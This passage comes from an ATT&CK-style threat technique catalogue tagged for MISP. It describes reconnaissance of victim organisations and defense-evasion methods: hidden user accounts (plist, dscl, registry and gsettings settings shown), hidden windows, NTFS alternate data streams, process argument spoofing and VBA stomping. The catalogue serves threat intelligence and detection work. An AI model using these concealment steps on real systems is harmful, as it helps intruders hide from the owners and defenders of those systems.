Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases]([WHOIS(https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Gather Victim Network Information"

Business Relationships

Adversaries may gather information about the victim’s business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([ThreatPost Broadvoice Leak(https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Business Relationships"

Determine Physical Locations

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Social Media]([ThreatPost Broadvoice Leak(https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).

The tag is: misp-galaxy:technique="Determine Physical Locations"

Identify Business Tempo

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([ThreatPost Broadvoice Leak(https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf))

The tag is: misp-galaxy:technique="Identify Business Tempo"

Identify Roles

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([ThreatPost Broadvoice Leak(https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Identify Roles"

Gather Victim Org Information

Adversaries may gather information about the victim’s organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites]([ThreatPost Broadvoice Leak(https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Gather Victim Org Information"

Group Policy Discovery

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.<sup>[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup> Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.

The tag is: misp-galaxy:technique="Group Policy Discovery"

Hardware Additions

Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.

While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.<sup>[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)]</sup><sup>[[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)]</sup><sup>[[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)]</sup><sup>[[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]</sup>

The tag is: misp-galaxy:technique="Hardware Additions"

Email Hiding Rules

Adversaries may use email rules to hide inbound emails in a compromised user’s mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets on Windows systems.<sup>[[Microsoft Inbox Rules](https://app.tidalcyber.com/references/91ce21f7-4cd5-4a75-a533-45d052a11c5d)]</sup><sup>[[MacOS Email Rules](https://app.tidalcyber.com/references/f83283aa-3aaf-4ebd-8503-0d84c2c627c4)]</sup><sup>[[Microsoft New-InboxRule](https://app.tidalcyber.com/references/54fcfc36-e0d5-422f-8a45-eeb7fa077a93)]</sup><sup>[[Microsoft Set-InboxRule](https://app.tidalcyber.com/references/28cc6142-cc4f-4e63-bcff-94347bc06b37)]</sup>

Adversaries may utilize email rules within a compromised user’s mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. <sup>[[Microsoft Cloud App Security](https://app.tidalcyber.com/references/be0a1168-fa84-4742-a658-41a078b7f5fa)]</sup>

In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).

The tag is: misp-galaxy:technique="Email Hiding Rules"

Hidden Files and Directories

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name <sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup> <sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>. Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app <sup>[[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]</sup>. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.

The tag is: misp-galaxy:technique="Hidden Files and Directories"

Hidden File System

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup>

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.<sup>[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]</sup><sup>[[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]</sup> Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.<sup>[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]</sup> Adversaries may also fragment files across the existing file system structure in non-standard ways.<sup>[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]</sup>

The tag is: misp-galaxy:technique="Hidden File System"

Hidden Users

Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.<sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup> Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by changing the <code>chflags</code> to hidden.<sup>[[Apple Support Hide a User Account](https://app.tidalcyber.com/references/e901df3b-76a6-41a5-9083-b28065e75aa2)]</sup>

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.<sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup><sup>[[US-CERT TA18-074A](https://app.tidalcyber.com/references/94e87a92-bf80-43e2-a3ab-cd7d4895f2fc)]</sup>

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).<sup>[[Hide GDM User Accounts](https://app.tidalcyber.com/references/88c3c460-3792-4881-ae7d-031c8901610d)]</sup> Display Managers are not anchored to specific distributions and may be changed by a user or adversary.

The tag is: misp-galaxy:technique="Hidden Users"

Hidden Window

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), Jscript, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. <sup>[[PowerShell About 2019](https://app.tidalcyber.com/references/2c504602-4f5d-47fc-9780-e1e5041a0b3a)]</sup>

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.<sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>

The tag is: misp-galaxy:technique="Hidden Window"

Ignore Process Interrupts

Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.<sup>[[Linux Signal Man](https://app.tidalcyber.com/references/63483956-fa3e-52da-a834-b3b762c4e84e)]</sup> These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.

Adversaries may invoke processes using nohup, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) -ErrorAction SilentlyContinue, or similar commands that may be immune to hangups.<sup>[[nohup Linux Man](https://app.tidalcyber.com/references/f61dde91-3518-5a74-8eb8-bb3bae43e8fb)]</sup><sup>[[Microsoft PowerShell SilentlyContinue](https://app.tidalcyber.com/references/ece52a64-1c8d-547d-aedc-ff43d7418cd2)]</sup> This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.

Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://app.tidalcyber.com/technique/82c07e34-9f67-4f4e-a513-c22a17b508e5) this does not establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) since the process will not be re-invoked once actually terminated.

The tag is: misp-galaxy:technique="Ignore Process Interrupts"

NTFS File Attributes

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> Within MFT entries are file attributes, <sup>[[Microsoft NTFS File Attributes Aug 2010](https://app.tidalcyber.com/references/dc4689d2-54b4-4310-ac10-6b234eedbc16)]</sup> such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). <sup>[[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)]</sup> <sup>[[Microsoft File Streams](https://app.tidalcyber.com/references/ef3f58da-e735-4b1d-914c-fafabb7439bf)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup> <sup>[[Microsoft ADS Mar 2014](https://app.tidalcyber.com/references/eae434ff-97c0-4a82-9f80-215e515befae)]</sup>

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. <sup>[[Journey into IR ZeroAccess NTFS EA](https://app.tidalcyber.com/references/e9dff187-fe7d-469d-81cb-30ad520dbd3d)]</sup> <sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>

The tag is: misp-galaxy:technique="NTFS File Attributes"

Process Argument Spoofing

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.<sup>[[Microsoft PEB 2021](https://app.tidalcyber.com/references/e0ec4cf6-1e6a-41ab-8704-a66c5cc4d226)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup>

Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.<sup>[[Cobalt Strike Arguments 2019](https://app.tidalcyber.com/references/e845f741-eabe-469b-97c1-f51a2aeb18b0)]</sup><sup>[[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]</sup><sup>[[Nviso Spoof Command Line 2020](https://app.tidalcyber.com/references/a3fa92ed-763c-4082-8220-cab82d70fad4)]</sup>

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup>

This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://app.tidalcyber.com/technique/449abc18-9faf-4ea6-a420-34528c28301d)) to manipulate or further evade process-based detections.

The tag is: misp-galaxy:technique="Process Argument Spoofing"

Resource Forking

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.<sup>[[macOS Hierarchical File System Overview](https://app.tidalcyber.com/references/4b8b110a-fc40-4094-a70d-15530bc05fec)]</sup> Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.<sup>[[Resource and Data Forks](https://app.tidalcyber.com/references/b8eaf053-40e0-414e-a89e-409dbf218554)]</sup><sup>[[ELC Extended Attributes](https://app.tidalcyber.com/references/e62d67ed-48d0-4141-aacc-92e165d66f16)]</sup>

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.<sup>[[sentinellabs resource named fork 2020](https://app.tidalcyber.com/references/0008dfd8-25a1-4e6a-9154-da7bcbb7daa7)]</sup><sup>[[tau bundlore erika noerenberg 2020](https://app.tidalcyber.com/references/1c62ed57-43f7-40d7-a5c9-46b40a40af0e)]</sup>

The tag is: misp-galaxy:technique="Resource Forking"

Run Virtual Instance

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.<sup>[[SingHealth Breach Jan 2019](https://app.tidalcyber.com/references/d1f699e3-7c9d-4a95-ad58-f46e665a4d37)]</sup>

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>

The tag is: misp-galaxy:technique="Run Virtual Instance"

VBA Stomping

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.<sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup>

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.<sup>[[Evil Clippy May 2019](https://app.tidalcyber.com/references/aafa27e8-5df7-4fc6-9fe5-9a438f2b507a)]</sup><sup>[[Microsoft _VBA_PROJECT Stream](https://app.tidalcyber.com/references/70c75ee4-4ba4-4124-8001-0fadb49a5ac6)]</sup>

An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.<sup>[[Walmart Roberts Oct 2018](https://app.tidalcyber.com/references/d1c88a57-85f4-4a35-a7fa-35e8c7fcd943)]</sup><sup>[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]</sup><sup>[[pcodedmp Bontchev](https://app.tidalcyber.com/references/3057d857-6984-4247-918b-952b75ee152e)]</sup>

The tag is: misp-galaxy:technique="VBA Stomping"

Hide Artifacts

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)]</sup><sup>[[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]</sup>

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.<sup>[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]</sup>

The tag is: misp-galaxy:technique="Hide Artifacts"

COR_PROFILER

